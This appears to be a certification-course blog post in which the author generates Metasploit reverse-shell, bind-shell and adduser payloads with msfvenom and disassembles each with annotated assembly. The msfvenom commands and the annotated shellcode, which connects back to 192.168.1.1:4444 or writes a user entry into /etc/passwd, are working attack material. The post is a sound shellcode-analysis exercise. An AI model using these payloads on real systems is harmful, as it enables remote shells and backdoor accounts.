SLAE32 - Assignment 5

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-15072

All associated code can be found here: https://github.com/pAP3R/public/tree/master/SLAE32/assignments

Shellcode Analysis

This task requests students to disassemble and analyze at least three shellcode samples created by metasploit, specifically those under the linux/x86 families. At the time of course creation, the tools msfpayload, msfencode etc had not yet been combined into msfvenom, which is what I'll obviously use.

Requirements:
  • Take up at least 3 shellcode samples created using Msfpayload for linux/x86
  • Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
  • Present your analysis
I decided to perform analysis on the following three payloads:
  • shell_reverse_tcp (a non-staged reverse shell)
  • shell_bind_tcp (a non-staged bind shell)
  • adduser (a payload for adding a user, duh)
Although not the most unique shellcodes, most other non-meterpreter payloads are, realistically, pretty simple. I chose the two metasploit equivalents of task 1 and 2, to see how a well optimized shellcode can perform similar tasks in fewer bytes. I went with ndisasm for the analysis of these shellcodes. It works well and accepts stdin.

shell_reverse_tcp

$ msfvenom -p linux/x86/shell_reverse_tcp RHOST=192.168.1.1 RPORT=4444 -f raw | ndisasm -u -
/var/lib/gems/2.5.0/gems/bundler-1.17.3/lib/bundler/rubygems_integration.rb:200: warning: constant Gem::ConfigMap is deprecated
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes

00000000  31DB              xor ebx,ebx
00000002  F7E3              mul ebx
[...]
00000040  B00B              mov al,0xb
00000042  CD80              int 0x80
68 bytes... That's impressive. My greenhorn linux reverse shell came in around 87 bytes, I think. That's not bad, but at the time I didn't see many ways to further optimize it. Comparing them now, optimizations are pretty clear.

Breaking down these shellcodes is easy if we separate them by syscalls. Below is the first snippet, until we encounter an int 0x80. The first call is to socketcall, or 0x66.
00000000  31DB              xor ebx,ebx  ; Zero out ebx
00000002  F7E3              mul ebx   ; zero out eax, mul returns the value in eax
00000004  53                push ebx   ; push 0 onto the stack for socket() 'protocol' argument [NULL]
00000005  43                inc ebx   ; increase ebx to 1
00000006  53                push ebx   ; push 1 onto the stack for socket() 'type' argument [SOCK_STREAM]
00000007  6A02              push byte +0x2  ; push 2 onto the stack for socket() 'domain' agument [AF_INET]
00000009  89E1              mov ecx,esp  ; move the pointer to the arguments for socketcall into ecx
0000000B  B066              mov al,0x66  ; move the syscall 0x66 (102) for socketcall into eax
0000000D  CD80              int 0x80   ; make the syscall (ebx contains the value 1, or 'socket()', set at 0x00000005)
The above asm is straightforward, but there are a lot of tricks and optimized register usages. The next bit of code is very clever-- I thought my loop for dup2 was well made, and now I see this efficient beast:
0000000F  93                xchg eax,ebx  ; socket() returns the file descriptor for the new socket in eax-- xcgh is a single byte less than a mov and is equivalent for this use
00000010  59                pop ecx   ; the last thing pushed to the stack was 0x02 at 0x00000007, pop that into ecx for a counter and our first dup2 arg
00000011  B03F              mov al,0x3f  ; mov the syscall 0x3F (63) into eax
00000013  CD80              int 0x80   ; call dup2, returning into eax on success
00000015  49                dec ecx   ; decrement ecx
00000016  79F9              jns 0x11   ; jump back to 0x00000011 if the SF flag is set
The above code acts as a very succint dup2 loop, taking only nine bytes total, and the loop itself eight. Until I read this I didn't think that you could just rearrange the format of the required calls, but that makes quite a lot of sense now. In retrospect, I wouldn't have been able to come up with a reason as to why you couldn't.

This next bit is responsible for calling 'connect()':
00000018  68C0A80110        push dword 0x1001a8c0 ; For the sockaddr struct, this is our IP in hex!
0000001D  680200115C        push dword 0x5c110002  ; Also for the sockaddr struct, this is the port!
00000022  89E1              mov ecx,esp   ; move the pointer for sockaddr into ecx
00000024  B066              mov al,0x66   ; move the syscall for socketcall() into eax
00000026  50                push eax    ; push the sockaddr length onto the stack
00000027  51                push ecx    ; push the pointer to sockaddr struct onto the stack
00000028  53                push ebx    ; push the socket file descriptor onto the stack
00000029  B303              mov bl,0x3    ; move the connect syscall into ebx
0000002B  89E1              mov ecx,esp   ; move the arguments for connect into ecx
0000002D  CD80              int 0x80    ; call connect!
This last bit is for actually executing the shell, via our good friend execve():
0000002F  52                push edx     ; push NULL onto the stack as first arg
00000030  686E2F7368        push dword 0x68732f6e ;
00000035  682F2F6269        push dword 0x69622f2f ; pushing //bin/sh onto the stack (backwards)
0000003A  89E3              mov ebx,esp   ; move the pointer to //bin/sh into ebx
0000003C  52                push edx    ; push another NULL
0000003D  53                push ebx    ; push the address of //bin/sh onto the stack
0000003E  89E1              mov ecx,esp   ; move the arguments into ecx
00000040  B00B              mov al,0xb    ; pass in the execve syscall number
00000042  CD80              int 0x80    ; call execve
There's nothing exceptionally different about how msf's shellcodes work, but they're clearly more well optimized than my reverse shell was.

shell_bind_tcp

$ msfvenom -p linux/x86/shell_bind_tcp LHOST=192.168.1.1 LPORT=4444 -f raw | ndisasm -u -
/var/lib/gems/2.5.0/gems/bundler-1.17.3/lib/bundler/rubygems_integration.rb:200: warning: constant Gem::ConfigMap is deprecated
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 78 bytes

00000000  31DB              xor ebx,ebx
00000002  F7E3              mul ebx
[...]
0000004A  B00B              mov al,0xb
0000004C  CD80              int 0x80
Coming in at 78 bytes, this one has mine beat by.. oh, 30 bytes or so? RIP me.

Anyway, starting from the top, we find that the initial call for socketcall(), calling socket(), is identical to the reverse shell we just looked at. I guess I didn't expect this, and I'm not really sure why I didn't.
00000000  31DB              xor ebx,ebx  ; Zero out ebx
00000002  F7E3              mul ebx   ; zero out eax, mul returns the value in eax
00000004  53                push ebx   ; push 0 onto the stack for socket() 'protocol' argument [NULL]
00000005  43                inc ebx   ; increase ebx to 1
00000006  53                push ebx   ; push 1 onto the stack for socket() 'type' argument [SOCK_STREAM]
00000007  6A02              push byte +0x2  ; push 2 onto the stack for socket() 'domain' agument [AF_INET]
00000009  89E1              mov ecx,esp  ; move the pointer to the arguments for socketcall into ecx
0000000B  B066              mov al,0x66  ; move the syscall 0x66 (102) for socketcall into eax
0000000D  CD80              int 0x80   ; make the syscall (ebx contains the value 1, or 'socket()', set at 0x00000005)
Moving on, the next portion of the shellcode is responsible for calling bind():
0000000F  5B                pop ebx    ; pop 0x02 into ebx for bind()
00000010  5E                pop esi    ; pop 0x01 into esi for later
00000011  52                push edx    ; start our sockaddr struct by pushing NULL onto the stack
00000012  680200115C        push dword 0x5c110002  ; push our port (5c11 = 4444) and AF_INET (0x02) onto the stack
00000017  6A10              push byte +0x10   ; push the size of the sockaddr struct
00000019  51                push ecx    ; push the sockaddr struct address (clever stack manipulations, initially set in connect!)
0000001A  50                push eax    ; push the socket file descriptor returned from socket()
0000001B  89E1              mov ecx,esp   ; move the address of arguments into ecx
0000001D  6A66              push byte +0x66   ;
0000001F  58                pop eax    ; push / pop is less bytes than mov
00000020  CD80              int 0x80    ; call bind()
This one struck me. Initially, the instructions at 0x00000019 blew my mind, but after stepping through it made total sense. This instruction is intended to put the pointer of the address of sockaddr onto the stack-- looking at it, it's just pushing ecx on... Well as it turns out, ecx actually still points to the correct address from when it was set in socket()! Some clever stack play lets us simply reuse the register without modification. That's pretty slick! It also got my wheels turning on making shellcode more efficient through techniques like these.

Next, we go to listen(), or 0x04:
00000022  894104            mov [ecx+0x4],eax  ; ecx is esp, add a null to esp + 4
00000025  B304              mov bl,0x4   ; move 0x4 (listen) into bl
00000027  B066              mov al,0x66  ; move socketcall into eax
00000029  CD80              int 0x80   ; call socketcall()
For the listen() function, a small stack manipulation is made in 0x00000022, simply to pass a null byte in as the 'backlog' parameter. ESP already points to the socket file descriptor, so we're good to go, otherwise!

Next up, a simple accept() call:
0000002B  43                inc ebx   ; increase ebx to 0x5 (accept)
0000002C  B066              mov al,0x66  ;
0000002E  CD80              int 0x80   ; call socketcall!
After calling accept, we move to the last two functions, our dup2 loop, which is the same, highly optimized code we saw in the reverse shell and lastly, calling the shell itself, which is also the same code from the reverse shell, this isn't annotated for that reason.
00000030  93                xchg eax,ebx   ; save the file descriptor from accept()
00000031  59                pop ecx    ; pop the initial FD from socket (pushed to the stack @ 0000001A)
00000032  6A3F              push byte +0x3f   ; start the dup2 loop
00000034  58                pop eax
00000035  CD80              int 0x80
00000037  49                dec ecx
00000038  79F8              jns 0x32    ; dup2 loop ends
0000003A  682F2F7368        push dword 0x68732f2f  ; execve starts
0000003F  682F62696E        push dword 0x6e69622f
00000044  89E3              mov ebx,esp
00000046  50                push eax
00000047  53                push ebx
00000048  89E1              mov ecx,esp
0000004A  B00B              mov al,0xb
0000004C  CD80              int 0x80    ; call execve!
Looking at the bind and the reverse shells, after a bit of getting this under my belt, it makes sense that there would be so much code reuse. The shellcodes once seemed so mysterious, but now I can see their immense similarities.

adduser

Rather than walk through some semi-similar staged shells, I wanted to take a quick glance at how msf handles adding a user via shellcode.
$ msfvenom -p linux/x86/adduser -f raw | ndisasm -u -
/var/lib/gems/2.5.0/gems/bundler-1.17.3/lib/bundler/rubygems_integration.rb:200: warning: constant Gem::ConfigMap is deprecated
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 97 bytes

00000000  31C9              xor ecx,ecx
00000002  89CB              mov ebx,ecx
[...]
0000005C  6A01              push byte +0x1
0000005E  58                pop eax
0000005F  CD80              int 0x80
The first syscall is for setgid() (0x46)
00000000  31C9              xor ecx,ecx  ; zero out ecx
00000002  89CB              mov ebx,ecx  ; zero out ebx
00000004  6A46              push byte +0x46  ; push 0x46 onto the stack
00000006  58                pop eax   ; pop it into eax
00000007  CD80              int 0x80   ; call setgid
After setgid, we see the following:
00000009  6A05              push byte +0x5    ; push 0x5 onto the stack
0000000B  58                pop eax     ; pop that value into eax for open() syscall
0000000C  31C9              xor ecx,ecx    ; zero out ecx
0000000E  51                push ecx     ; push a zero onto the stack
0000000F  6873737764        push dword 0x64777373  ;
00000014  682F2F7061        push dword 0x61702f2f  ;
00000019  682F657463        push dword 0x6374652f  ; push /etc//passwd onto the stack
0000001E  89E3              mov ebx,esp    ; move the pointer to /etc//passwd into ebx
00000020  41                inc ecx     ; increase ecx to 0x1
00000021  B504              mov ch,0x4     ; move 0x4 into the upper bit of the lowest ECX register, creating 0x401 (write and O_NOCTTY flag)
00000023  CD80              int 0x80     ; call open()
Next, if you look at the shellcode and think wtf, you're not wrong. After a quick xchg and a call, this section is a jumble as it's actually ascii we're looking at, not legitimate instructions.
00000025  93                xchg eax,ebx  ; xchg the file descriptor that open() returned
00000026  E828000000        call 0x53   ; call 0x53, and skip all the junk
0000002B  6D                insd
0000002C  657461            gs jz 0x90
0000002F  7370              jnc 0xa1
00000031  6C                insb
00000032  6F                outsd
00000033  69743A417A2F6449  imul esi,[edx+edi+0x41],dword 0x49642f7a
0000003B  736A              jnc 0xa7
0000003D  3470              xor al,0x70
0000003F  3449              xor al,0x49
00000041  52                push edx
00000042  633A              arpl [edx],di
00000044  303A              xor [edx],bh
00000046  303A              xor [edx],bh
00000048  3A2F              cmp ch,[edi]
0000004A  3A2F              cmp ch,[edi]
0000004C  62696E            bound ebp,[ecx+0x6e]
0000004F  2F                das
00000050  7368              jnc 0xba
00000052  0A598B            or bl,[ecx-0x75]
So, we xchg the file descriptor and call the next part of the legit payload, starting at offset 53. Our shellcode looks a little jumbled though, and we can't get an accurate disassembly moving forward without going at it by hand. But, ndisasm has a -k option which allows us to disassemble from an offset. We can use that here:
$ msfvenom -p linux/x86/adduser -f raw | ndisasm -u -k 43,40 -
/var/lib/gems/2.5.0/gems/bundler-1.17.3/lib/bundler/rubygems_integration.rb:200: warning: constant Gem::ConfigMap is deprecated
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 97 bytes

00000000  31C9              xor ecx,ecx
[...]
00000025  93                xchg eax,ebx
00000026  E828000000        call 0x53
0000002B  skipping 0x28 bytes
00000053  59                pop ecx
00000054  8B51FC            mov edx,[ecx-0x4]
00000057  6A04              push byte +0x4
00000059  58                pop eax
0000005A  CD80              int 0x80
0000005C  6A01              push byte +0x1
0000005E  58                pop eax
0000005F  CD80              int 0x80
That's much cleaner! Starting from 0x00000053, the syscall for write, with the associated arguments (count, pointer to characters and the file descriptor from open() )
00000053  59                pop ecx    ; pop the location of the string into ecx (call leaves it on the stack!)
00000054  8B51FC            mov edx,[ecx-0x4] ; store the string's length into edx
00000057  6A04              push byte +0x4   ;
00000059  58                pop eax    ; pop 0x4 (write) into eax
0000005A  CD80              int 0x80    ; call write()
Lastly, we call sys_exit with a push, pop.
0000005C  6A01              push byte +0x1
0000005E  58                pop eax
0000005F  CD80              int 0x80
And that's it for assignment 5!

Comments

Popular posts from this blog

06 - How to maybe not be so bad at fuzzing, Part 2

07 - Just Another OSCE Review

05 - How to maybe not be so bad at fuzzing, Part 1